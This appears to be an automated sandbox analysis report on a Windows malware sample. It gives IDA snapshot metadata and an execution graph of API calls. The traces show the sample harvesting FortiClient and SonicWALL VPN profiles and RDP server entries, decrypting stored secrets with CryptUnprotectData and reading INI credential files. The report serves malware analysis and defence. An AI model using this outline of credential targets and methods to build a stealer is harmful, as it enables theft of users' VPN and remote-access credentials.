                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AppendPathlstrcpy
                                                                                                                              • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                                                                              • API String ID: 3043196718-4231764533
                                                                                                                              • Opcode ID: 4209a7626a406522bcd4556fbae64232996b1dbfe7f6830d41379ce7dac43f30
                                                                                                                              • Instruction ID: 7a47b6c75842f14c5de151cf3d6b5df0b6162ae964a954845282a5daf6011c6b
                                                                                                                              • Opcode Fuzzy Hash: 4209a7626a406522bcd4556fbae64232996b1dbfe7f6830d41379ce7dac43f30
                                                                                                                              • Instruction Fuzzy Hash: 3331D475A04A81C1DA60EF22D8409F9A361FB88BC0F984136FE5D2B749DF3CD544C710
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateValue
                                                                                                                              • String ID: ?
                                                                                                                              • API String ID: 1818849710-1684325040
                                                                                                                              • Opcode ID: 3f4fa53e5a041a1e0e060734a6e5b713b9a361546c9d3b1e30c4574215ea1982
                                                                                                                              • Instruction ID: 1709045ecb617e1c84f802440414984b0da3cf9233c5d26703b9729363e058d5
                                                                                                                              • Opcode Fuzzy Hash: 3f4fa53e5a041a1e0e060734a6e5b713b9a361546c9d3b1e30c4574215ea1982
                                                                                                                              • Instruction Fuzzy Hash: 2E21A476A14780CAE7609F71A8405EDBBA4FB4D79CB944226EACC57B59DB3CC144CB10
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                                                                              • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                                                                              • API String ID: 784796242-1893226844
                                                                                                                              • Opcode ID: c16fdb4d624e558078139f6db0a2be6db5bd52292e2e96c0ecb44f9c092f2e46
                                                                                                                              • Instruction ID: c84d34536f596bb0d87516f4c993c17516c589c7552245006e7bce4e614cd179
                                                                                                                              • Opcode Fuzzy Hash: c16fdb4d624e558078139f6db0a2be6db5bd52292e2e96c0ecb44f9c092f2e46
                                                                                                                              • Instruction Fuzzy Hash: 31119351A08582D0DDA0FB11E8957FAE321EF847C0FC85136F99E5B79ADE2CD104C750
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Value$AppendPathlstrcpy
                                                                                                                              • String ID: Software\Microsoft\Terminal Server Client\Servers
                                                                                                                              • API String ID: 19203174-1233151749
                                                                                                                              • Opcode ID: 987b66f9db0bf2f6b47be05366b15036cb541ecc7426d31690f181000543a1b8
                                                                                                                              • Instruction ID: 94d001d4cfe4b5a43efdb35f8e69759e708326235071ce113857379e292d7e88
                                                                                                                              • Opcode Fuzzy Hash: 987b66f9db0bf2f6b47be05366b15036cb541ecc7426d31690f181000543a1b8
                                                                                                                              • Instruction Fuzzy Hash: 7521B161614682C4DAA0BF62D854AFDA350FF88BC4F880136FA4E5B79ADE3CD204C750
                                                                                                                              APIs
                                                                                                                              • GetEnvironmentVariableW.KERNEL32 ref: 00007FF763AFFE25
                                                                                                                              • lstrcatW.KERNEL32 ref: 00007FF763AFFE32
                                                                                                                                • Part of subcall function 00007FF763AFFF50: lstrlenW.KERNEL32 ref: 00007FF763AFFF76
                                                                                                                                • Part of subcall function 00007FF763AFFF50: lstrlenW.KERNEL32 ref: 00007FF763AFFF92
                                                                                                                                • Part of subcall function 00007FF763AFFF50: WideCharToMultiByte.KERNEL32 ref: 00007FF763AFFFBB
                                                                                                                                • Part of subcall function 00007FF763AFFF50: PathFileExistsA.SHLWAPI ref: 00007FF763AFFFC4
                                                                                                                                • Part of subcall function 00007FF763AFFF50: OpenFile.KERNEL32 ref: 00007FF763AFFFDD
                                                                                                                                • Part of subcall function 00007FF763AFFF50: GetFileSize.KERNEL32 ref: 00007FF763AFFFFD
                                                                                                                                • Part of subcall function 00007FF763AFFF50: CreateFileMappingA.KERNEL32 ref: 00007FF763B00034
                                                                                                                                • Part of subcall function 00007FF763AFFF50: MapViewOfFile.KERNEL32 ref: 00007FF763B00055
                                                                                                                                • Part of subcall function 00007FF763AFFF50: __memcpy.DELAYIMP ref: 00007FF763B00067
                                                                                                                                • Part of subcall function 00007FF763AFFF50: UnmapViewOfFile.KERNEL32 ref: 00007FF763B00072
                                                                                                                                • Part of subcall function 00007FF763AFFF50: CloseHandle.KERNEL32 ref: 00007FF763B0007B
                                                                                                                                • Part of subcall function 00007FF763AFFF50: CloseHandle.KERNEL32 ref: 00007FF763B00084
                                                                                                                                • Part of subcall function 00007FF763AFF294: __memcpy.DELAYIMP ref: 00007FF763AFF2B2
                                                                                                                                • Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
                                                                                                                                • Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
                                                                                                                              • String ID: APPDATA
                                                                                                                              • API String ID: 2395011915-4054820676
                                                                                                                              • Opcode ID: dec221e76dea18377a8f89e866c3efc32397943ca6a6be3b2fbcbd2e501cfc2f
                                                                                                                              • Instruction ID: ba8a5518a7e080e8080697624f9c1b582a61a2fb9e01a9b6d4fb666ba88e18df
                                                                                                                              • Opcode Fuzzy Hash: dec221e76dea18377a8f89e866c3efc32397943ca6a6be3b2fbcbd2e501cfc2f
                                                                                                                              • Instruction Fuzzy Hash: A7114F22728A42D1EB90EB10E4409EDB3A1FB88784FC8403AFA8D57B59EF3CD508C750

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:3.8%
                                                                                                                              Dynamic/Decrypted Code Coverage:50.5%
                                                                                                                              Signature Coverage:3.2%
                                                                                                                              Total number of Nodes:786
                                                                                                                              Total number of Limit Nodes:83
                                                                                                                              execution_graph 28216 810284 39 API calls 28113 84348f 27 API calls 27696 803098 27697 801b6a 2 API calls 27696->27697 27699 8030af 27697->27699 27698 8033a9 27699->27698 27720 801000 GetProcessHeap RtlAllocateHeap 27699->27720 27701 8030ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27702 854bec 89 API calls 27701->27702 27705 803126 27702->27705 27703 80339b DeleteFileW 27704 801011 3 API calls 27703->27704 27704->27698 27705->27703 27706 803392 27705->27706 27721 8202ec 94 API calls 27705->27721 27708 853848 76 API calls 27706->27708 27708->27703 27709 803381 27724 81fb92 93 API calls 27709->27724 27712 80319c RtlCompareMemory 27713 8032cd CryptUnprotectData 27712->27713 27714 803155 27712->27714 27713->27714 27714->27709 27714->27712 27714->27713 27715 8031d0 RtlZeroMemory 27714->27715 27717 801011 3 API calls 27714->27717 27718 801fa7 19 API calls 27714->27718 27719 801798 lstrlen 27714->27719 27723 8202ec 94 API calls 27714->27723 27722 801000 GetProcessHeap RtlAllocateHeap 27715->27722 27717->27714 27718->27714 27719->27714 27720->27701 27721->27714 27722->27714 27723->27714 27724->27706 28221 816698 30 API calls 28117 842c9e 104 API calls 28222 80629a 23 API calls 28226 8056a2 _allrem 27960 8024a4 27963 802198 RtlZeroMemory GetVersionExW 27960->27963 27964 8021cb LoadLibraryW 27963->27964 27966 80249b 27964->27966 27967 8021fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27964->27967 27968 802492 FreeLibrary 27967->27968 27972 802244 27967->27972 27968->27966 27969 80247b 27969->27968 27970 8022e1 RtlCompareMemory 27970->27972 27971 802365 RtlCompareMemory 27971->27972 27972->27968 27972->27969 27972->27970 27972->27971 27973 801953 6 API calls 27972->27973 27974 8023f8 StrStrIW 27972->27974 27975 801011 GetProcessHeap RtlFreeHeap VirtualQuery 27972->27975 27976 8017c0 9 API calls 27972->27976 27973->27972 27974->27972 27975->27972 27976->27972 27980 802ea5 25 API calls 27981 809ea7 RtlAllocateHeap 27982 809ec1 27981->27982 27983 809ed9 27981->27983 27985 807f70 17 API calls 27982->27985 27985->27983 28119 81b8a6 90 API calls 28120 81b0aa 84 API calls 28121 806eb7 24 API calls 28122 8048b1 22 API calls 28012 802cb5 28013 802cbe 28012->28013 28014 801953 6 API calls 28013->28014 28015 802cc3 28014->28015 28016 802e17 28015->28016 28017 801953 6 API calls 28015->28017 28018 802cd9 28017->28018 28041 801000 GetProcessHeap RtlAllocateHeap 28018->28041 28020 802ce9 28042 801000 GetProcessHeap RtlAllocateHeap 28020->28042 28022 802cf9 28023 801b6a 2 API calls 28022->28023 28024 802d04 28023->28024 28025 802ded 28024->28025 28026 802d0c GetPrivateProfileSectionNamesW 28024->28026 28027 801011 3 API calls 28025->28027 28026->28025 28039 802d22 28026->28039 28028 802e02 28027->28028 28029 801011 3 API calls 28028->28029 28031 802e09 28029->28031 28030 802d3f StrStrIW 28032 802d53 GetPrivateProfileStringW 28030->28032 28033 802dd7 lstrlenW 28030->28033 28034 801011 3 API calls 28031->28034 28032->28033 28035 802d72 GetPrivateProfileIntW 28032->28035 28033->28025 28033->28039 28036 802e10 28034->28036 28035->28039 28037 801011 3 API calls 28036->28037 28037->28016 28038 801953 6 API calls 28038->28039 28039->28025 28039->28030 28039->28033 28039->28038 28040 801011 3 API calls 28039->28040 28040->28039 28041->28020 28042->28022 28123 8178b9 33 API calls 28229 8212bb _allmul _allmul _allmul _alldvrm _allmul 28124 8213ca 87 API calls 28231 8213ca 89 API calls 28232 8096bc _alldiv _alldiv _alldiv _alldiv _allmul 28126 805cc5 22 API calls 28237 82faca _allmul strcspn 28127 806eb7 22 API calls 28128 815cca 32 API calls 28130 8534ca 57 API calls 28241 82c6da 23 API calls 28134 8370de 24 API calls 27986 809ee8 27987 809ef1 RtlFreeHeap 27986->27987 27988 809f1a 27986->27988 27987->27988 27989 809f02 27987->27989 27991 807f70 17 API calls 27989->27991 27991->27988 28137 80f4ec 20 API calls 28138 804cf5 memset 28243 839ef6 114 API calls 28139 8213ca 89 API calls 28051 8028f8 28052 802900 28051->28052 28053 802ac8 28051->28053 28083 801000 GetProcessHeap RtlAllocateHeap 28052->28083 28055 853848 76 API calls 28053->28055 28057 802ad1 DeleteFileW 28055->28057 28056 80290e 28084 8202ec 94 API calls 28056->28084 28059 801011 3 API calls 28057->28059 28060 802adf 28059->28060 28062 802a98 lstrlen 28064 802ac1 28062->28064 28065 802aa4 28062->28065 28063 802919 28072 801fa7 19 API calls 28063->28072 28073 8029da lstrlen 28063->28073 28077 802a8b 28063->28077 28085 801000 GetProcessHeap RtlAllocateHeap 28063->28085 28086 802112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28063->28086 28087 8202ec 94 API calls 28063->28087 28067 801011 3 API calls 28064->28067 28089 801798 lstrlen 28065->28089 28067->28053 28068 802ab1 28090 801798 lstrlen 28068->28090 28070 802ab9 28091 801798 lstrlen 28070->28091 28072->28063 28073->28063 28074 8029eb lstrlen 28073->28074 28074->28063 28088 81fb92 93 API calls 28077->28088 28079 802a25 wsprintfA lstrlen 28080 802a58 28079->28080 28081 802a6a lstrcat 28079->28081 28080->28081 28082 801011 3 API calls 28081->28082 28082->28063 28083->28056 28084->28063 28085->28063 28086->28079 28087->28063 28088->28062 28089->28068 28090->28070 28091->28064 28245 80ca01 _allmul _alldiv _allmul _alldiv 28140 839000 28 API calls 28143 845401 memset memcpy memcpy memset memcpy 27382 804406 27387 802e30 StrStrIW 27382->27387 27385 802e30 22 API calls 27386 80443a 27385->27386 27388 802e57 27387->27388 27389 802ebc 27387->27389 27424 8019e5 27388->27424 27413 801000 GetProcessHeap RtlAllocateHeap 27389->27413 27393 802ed0 RegOpenKeyExW 27394 802f68 27393->27394 27412 802eee 27393->27412 27397 801011 3 API calls 27394->27397 27396 802f50 RegEnumKeyExW 27399 802f5e RegCloseKey 27396->27399 27396->27412 27400 802f6f 27397->27400 27398 802e75 27401 802eb5 27398->27401 27439 801afe 27398->27439 27399->27394 27400->27385 27403 801011 3 API calls 27401->27403 27403->27389 27407 801011 3 API calls 27407->27401 27408 80199d 9 API calls 27410 802e91 27408->27410 27409 802e30 18 API calls 27409->27412 27410->27407 27411 801011 3 API calls 27411->27412 27412->27396 27412->27409 27412->27411 27414 801953 27412->27414 27419 80199d 27412->27419 27413->27393 27415 801964 lstrlenW lstrlenW 27414->27415 27447 801000 GetProcessHeap RtlAllocateHeap 27415->27447 27418 801986 lstrcatW lstrcatW 27418->27412 27420 801953 6 API calls 27419->27420 27421 8019a6 27420->27421 27422 801011 3 API calls 27421->27422 27423 8019af 27422->27423 27423->27412 27425 8019f7 27424->27425 27426 8019fa RegOpenKeyExW 27424->27426 27425->27426 27427 801aa2 27426->27427 27428 801a28 RegQueryValueExW 27426->27428 27429 801ab9 27427->27429 27432 8019e5 5 API calls 27427->27432 27430 801a94 RegCloseKey 27428->27430 27431 801a46 27428->27431 27429->27389 27438 801bc5 10 API calls 27429->27438 27430->27427 27430->27429 27431->27430 27448 801000 GetProcessHeap RtlAllocateHeap 27431->27448 27432->27429 27434 801a61 RegQueryValueExW 27435 801a8b 27434->27435 27436 801a7f 27434->27436 27437 801011 3 API calls 27435->27437 27436->27430 27437->27436 27438->27398 27449 801000 GetProcessHeap RtlAllocateHeap 27439->27449 27441 801b0d SHGetFolderPathW 27442 801b20 27441->27442 27443 801b63 27441->27443 27444 801011 3 API calls 27442->27444 27443->27408 27443->27410 27446 801b28 27444->27446 27445 8019e5 9 API calls 27445->27446 27446->27443 27446->27445 27447->27418 27448->27434 27449->27441 27590 80a40e 27591 80a4a2 27590->27591 27594 80a426 27590->27594 27593 80a4cc ReadFile 27591->27593 27596 80a524 27591->27596 27601 80a501 27591->27601 27592 80a469 memcpy 27592->27591 27593->27591 27593->27596 27594->27591 27594->27592 27595 80a44a memcpy 27594->27595 27598 80a45d 27595->27598 27604 80a2aa 17 API calls 27596->27604 27599 80a532 27599->27598 27600 80a53e memset 27599->27600 27600->27598 27603 80a1c6 18 API calls 27601->27603 27603->27598 27604->27599 28248 820e0c 22 API calls 28147 805818 _alldiv _allrem _allmul 28251 82f21c 23 API calls 28149 83e024 93 API calls 28152 80482b 14 API calls 27992 80f433 27993 80f445 27992->27993 27998 8123b9 27993->27998 27995 80f47c 27997 80f490 27995->27997 28006 80e206 58 API calls 27995->28006 27999 8123d3 27998->27999 28001 812473 27998->28001 28002 812431 27999->28002 28010 813451 43 API calls 27999->28010 28001->27995 28002->28001 28007 8063f7 28002->28007 28004 81240f 28004->28002 28011 81235a 17 API calls 28004->28011 28006->27997 28009 80bafc 20 API calls 28007->28009 28008 806400 28008->28001 28009->28008 28010->28004 28011->28002 28156 81943d 34 API calls 27250 803c40 27286 801b6a 27250->27286 27252 803c50 27253 803dfa 27252->27253 27292 801000 GetProcessHeap RtlAllocateHeap 27252->27292 27255 803c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27293 854bec 27255->27293 27257 803dec DeleteFileW 27304 801011 27257->27304 27259 803c9a 27259->27257 27260 803de3 27259->27260 27309 801000 GetProcessHeap RtlAllocateHeap 27259->27309 27317 853848 27260->27317 27263 803cce 27310 8202ec 94 API calls 27263->27310 27265 803da8 27313 81fb92 93 API calls 27265->27313 27267 801fa7 19 API calls 27278 803cd9 27267->27278 27268 803db1 lstrlen 27269 803db9 27268->27269 27270 803ddc 27268->27270 27314 801798 lstrlen 27269->27314 27272 801011 3 API calls 27270->27272 27272->27260 27273 803dc8 27315 801798 lstrlen 27273->27315 27274 803d2b lstrlen 27276 803d35 lstrlen 27274->27276 27274->27278 27276->27278 27277 803dd2 27316 801798 lstrlen 27277->27316 27278->27265 27278->27267 27278->27274 27311 801000 GetProcessHeap RtlAllocateHeap 27278->27311 27312 8202ec 94 API calls 27278->27312 27282 803d46 wsprintfA lstrlen 27283 803d71 27282->27283 27284 803d83 lstrcat 27282->27284 27283->27284 27285 801011 3 API calls 27284->27285 27285->27278 27287 801b99 27286->27287 27288 801b6f 27286->27288 27287->27252 27288->27287 27289 801b76 CreateFileW 27288->27289 27290 801b95 27289->27290 27291 801b8d CloseHandle 27289->27291 27290->27252 27291->27290 27292->27255 27320 85307c 27293->27320 27295 854c01 27303 854c44 27295->27303 27330 81c54d memset 27295->27330 27297 854c18 27331 81c871 21 API calls 27297->27331 27299 854c2a 27332 81c518 19 API calls 27299->27332 27301 854c33 27301->27303 27333 85486f 89 API calls 27301->27333 27303->27259 27355 801162 VirtualQuery 27304->27355 27307 80102d 27307->27253 27308 80101d GetProcessHeap RtlFreeHeap 27308->27307 27309->27263 27310->27278 27311->27282 27312->27278 27313->27268 27314->27273 27315->27277 27316->27270 27357 8537cb 27317->27357 27322 853095 27320->27322 27329 85308e 27320->27329 27321 8530ad 27324 8530ed memset 27321->27324 27321->27329 27322->27321 27347 8066ce 17 API calls 27322->27347 27325 853108 27324->27325 27326 853116 27325->27326 27348 80c59d 17 API calls 27325->27348 27326->27329 27334 806512 27326->27334 27329->27295 27330->27297 27331->27299 27332->27301 27333->27303 27349 80685c 27334->27349 27336 806519 27337 80651d 27336->27337 27338 80bfec GetSystemInfo 27336->27338 27337->27329 27352 8065bd 27338->27352 27340 80c00e 27341 8065bd 16 API calls 27340->27341 27342 80c01a 27341->27342 27343 8065bd 16 API calls 27342->27343 27344 80c026 27343->27344 27345 8065bd 16 API calls 27344->27345 27346 80c032 27345->27346 27346->27329 27347->27321 27348->27326 27350 85307c 17 API calls 27349->27350 27351 806861 27350->27351 27351->27336 27353 85307c 17 API calls 27352->27353 27354 8065c2 27353->27354 27354->27340 27356 801019 27355->27356 27356->27307 27356->27308 27358 8537d6 27357->27358 27359 8537e9 27357->27359 27369 8095b5 17 API calls 27358->27369 27359->27257 27361 8537db 27362 8537df 27361->27362 27365 8537eb 27361->27365 27370 854da0 17 API calls 27362->27370 27364 853834 27372 853865 71 API calls 27364->27372 27365->27364 27367 85381f 27365->27367 27371 808795 22 API calls 27367->27371 27369->27361 27370->27359 27371->27359 27372->27359 28157 804440 24 API calls 28257 869238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28158 826440 94 API calls 28259 8213ca 102 API calls 28160 847452 19 API calls 28261 805e5a 28 API calls 27749 80105d VirtualFree 28162 842864 25 API calls 28266 833e6b 20 API calls 28164 81f86a 31 API calls 28165 804c6d 17 API calls 28267 820670 _allmul _allmul _allmul _alldvrm 28167 826871 8 API calls 28268 826e71 21 API calls 28171 85507d 24 API calls 28172 80b079 20 API calls 28174 81807c 23 API calls 28176 827d8b _allrem memcpy 28273 81ab8b 19 API calls 28274 81cb91 18 API calls 28178 81fd97 19 API calls 28275 8213ca 88 API calls 28179 801198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28277 80bf9a _alldiv 27792 801b9d 27793 801bc1 27792->27793 27794 801ba2 27792->27794 27794->27793 27795 801ba9 GetFileAttributesW 27794->27795 27796 801bb5 27795->27796 27836 80639e 27840 80b1e3 27836->27840 27860 80b1e5 27836->27860 27837 8063b2 27841 80b1e5 27840->27841 27842 80b214 27841->27842 27896 80aeea 27841->27896 27844 80b233 27842->27844 27853 80b28f 27842->27853 27914 80ae65 27842->27914 27844->27853 27880 80a7ae 27844->27880 27847 80b26d 27920 80a1c6 18 API calls 27847->27920 27848 80b2d6 27893 806a5a 27848->27893 27853->27837 27855 80b2e8 27855->27853 27856 80b310 CreateFileMappingW 27855->27856 27857 80b32b MapViewOfFile 27856->27857 27858 80b37e 27856->27858 27857->27855 27857->27858 27921 80a1c6 18 API calls 27858->27921 27861 80b214 27860->27861 27862 80b20d 27860->27862 27864 80b233 27861->27864 27865 80ae65 22 API calls 27861->27865 27873 80b28f 27861->27873 27863 80aeea 27 API calls 27862->27863 27863->27861 27866 80a7ae 18 API calls 27864->27866 27864->27873 27865->27864 27867 80b267 27866->27867 27868 80b2d6 27867->27868 27870 80b26d 27867->27870 27871 80a67c 22 API calls 27867->27871 27867->27873 27869 806a5a 17 API calls 27868->27869 27875 80b2e8 27869->27875 27958 80a1c6 18 API calls 27870->27958 27874 80b2be 27871->27874 27873->27837 27874->27868 27874->27870 27875->27873 27876 80b310 CreateFileMappingW 27875->27876 27877 80b32b MapViewOfFile 27876->27877 27878 80b37e 27876->27878 27877->27875 27877->27878 27959 80a1c6 18 API calls 27878->27959 27881 80a7c7 27880->27881 27883 80a805 27881->27883 27922 80a1c6 18 API calls 27881->27922 27883->27847 27883->27848 27883->27853 27884 80a67c 27883->27884 27885 80a6c1 27884->27885 27886 80a694 _alldiv _allmul 27884->27886 27923 80a33b SetFilePointer 27885->27923 27886->27885 27889 80a6f0 SetEndOfFile 27890 80a6d4 27889->27890 27891 80a6ee 27889->27891 27890->27891 27927 80a1c6 18 API calls 27890->27927 27891->27847 27891->27848 27894 85307c 17 API calls 27893->27894 27895 806a65 27894->27895 27895->27855 27897 806a81 memset 27896->27897 27898 80af01 27897->27898 27899 806a81 memset 27898->27899 27913 80af07 27898->27913 27900 80af2a 27899->27900 27900->27913 27929 807f07 27900->27929 27902 80af54 27903 8552ae _allmul 27902->27903 27902->27913 27904 80afd9 27903->27904 27905 80b87b 21 API calls 27904->27905 27906 80affa 27905->27906 27907 80b020 27906->27907 27908 80b000 27906->27908 27909 80ae65 22 API calls 27907->27909 27937 80a1c6 18 API calls 27908->27937 27911 80b01c 27909->27911 27911->27913 27932 80adcc 27911->27932 27913->27842 27915 80ae7a 27914->27915 27916 80a67c 22 API calls 27915->27916 27917 80ae83 27915->27917 27918 80aea5 27916->27918 27917->27844 27918->27917 27957 80a1c6 18 API calls 27918->27957 27920->27853 27921->27853 27922->27883 27924 80a390 27923->27924 27925 80a36a 27923->27925 27924->27889 27924->27890 27925->27924 27928 80a1c6 18 API calls 27925->27928 27927->27891 27928->27924 27938 807ec7 27929->27938 27935 80ade4 27932->27935 27933 80ae5f 27933->27913 27935->27933 27943 80bafc 27935->27943 27954 80a39e 18 API calls 27935->27954 27937->27911 27939 807ed4 27938->27939 27940 807ed9 27938->27940 27939->27902 27942 806e6a 17 API calls 27940->27942 27942->27939 27944 80b609 memset 27943->27944 27951 80bb14 27944->27951 27945 80bb3f GetFileAttributesW 27946 80bb4b 27945->27946 27945->27951 27948 80bb5b 27946->27948 27949 80bb7d 27946->27949 27947 80bb25 DeleteFileW 27947->27949 27947->27951 27955 80a1c6 18 API calls 27948->27955 27956 80a2aa 17 API calls 27949->27956 27951->27945 27951->27947 27951->27948 27953 80bb1a 27951->27953 27953->27935 27954->27935 27955->27953 27956->27953 27957->27917 27958->27873 27959->27873 28181 8111a0 43 API calls 28278 828ba6 7 API calls 28279 8453ad memset memcpy memset memcpy 28280 8433b7 27 API calls 28183 829dbc 25 API calls 28281 8213ca 89 API calls 28282 8373c4 22 API calls 27583 809fc8 27584 809fd3 27583->27584 27586 809fd8 27583->27586 27585 809ff4 HeapCreate 27585->27584 27587 80a004 27585->27587 27586->27584 27586->27585 27589 807f70 17 API calls 27587->27589 27589->27584 28285 8213ca 89 API calls 28184 853dc8 24 API calls 27725 8043d9 27732 804317 _alloca_probe RegOpenKeyW 27725->27732 27728 804317 25 API calls 27729 8043f5 27728->27729 27730 804317 25 API calls 27729->27730 27731 804403 27730->27731 27733 804343 RegEnumKeyExW 27732->27733 27734 8043cf 27732->27734 27735 8043c4 RegCloseKey 27733->27735 27738 80436d 27733->27738 27734->27728 27735->27734 27736 801953 6 API calls 27736->27738 27737 80199d 9 API calls 27737->27738 27738->27736 27738->27737 27740 801011 3 API calls 27738->27740 27743 80418a 16 API calls 27738->27743 27741 80439b RegEnumKeyExW 27740->27741 27741->27738 27742 8043c3 27741->27742 27742->27735 27743->27738 28288 80ebd9 37 API calls 27750 8015dd 27751 801600 27750->27751 27752 8015f3 lstrlen 27750->27752 27761 801000 GetProcessHeap RtlAllocateHeap 27751->27761 27752->27751 27754 801608 lstrcat 27755 801644 27754->27755 27756 80163d lstrcat 27754->27756 27762 801333 27755->27762 27756->27755 27759 801011 3 API calls 27760 801667 27759->27760 27761->27754 27785 801000 GetProcessHeap RtlAllocateHeap 27762->27785 27764 801357 27786 80106c lstrlen MultiByteToWideChar 27764->27786 27766 801366 27787 8012a3 RtlZeroMemory 27766->27787 27769 8013b8 RtlZeroMemory 27773 8013ed 27769->27773 27770 801011 3 API calls 27771 8015d2 27770->27771 27771->27759 27772 8015b5 27772->27770 27773->27772 27789 801000 GetProcessHeap RtlAllocateHeap 27773->27789 27775 8014a7 wsprintfW 27777 8014c9 27775->27777 27776 8015a1 27778 801011 3 API calls 27776->27778 27777->27776 27790 801000 GetProcessHeap RtlAllocateHeap 27777->27790 27778->27772 27780 801533 27781 80159a 27780->27781 27791 80104c VirtualAlloc 27780->27791 27783 801011 3 API calls 27781->27783 27783->27776 27784 80158a RtlMoveMemory 27784->27781 27785->27764 27786->27766 27788 8012c5 27787->27788 27788->27769 27788->27772 27789->27775 27790->27780 27791->27784 27797 8063dd 27800 80b87b 27797->27800 27798 8063f4 27801 80b88d memset 27800->27801 27809 80b8e5 27801->27809 27804 80ba3c 27804->27798 27805 80b965 CreateFileW 27805->27809 27808 80ba14 27821 80a1c6 18 API calls 27808->27821 27809->27801 27809->27804 27809->27805 27809->27808 27811 80ba41 27809->27811 27815 80b609 27809->27815 27818 80b64b 18 API calls 27809->27818 27819 80bb9f 18 API calls 27809->27819 27820 80a2aa 17 API calls 27809->27820 27823 8552ae 27811->27823 27812 80ba32 27822 854db2 17 API calls 27812->27822 27827 80a08a 27815->27827 27817 80b60f 27817->27809 27818->27809 27819->27809 27820->27809 27821->27812 27822->27804 27824 8552bb 27823->27824 27826 8552d1 27824->27826 27835 83ba08 _allmul 27824->27835 27826->27804 27828 80a0a4 27827->27828 27829 80a0aa 27828->27829 27831 806a81 27828->27831 27829->27817 27832 806a8f 27831->27832 27833 806aa4 27832->27833 27834 806a95 memset 27832->27834 27833->27829 27834->27833 27835->27826 28186 8099e1 strncmp 28187 80c9ea _allmul _alldiv 28189 8555eb IsProcessorFeaturePresent 28191 8049f1 13 API calls 28290 8213ca 72 API calls 28291 819ff0 32 API calls 28192 80d1f7 memset _allmul _allmul 28092 8047fa 28099 80479c 28092->28099 28095 80479c 23 API calls 28096 804813 28095->28096 28097 80479c 23 API calls 28096->28097 28098 80481f 28097->28098 28100 801afe 10 API calls 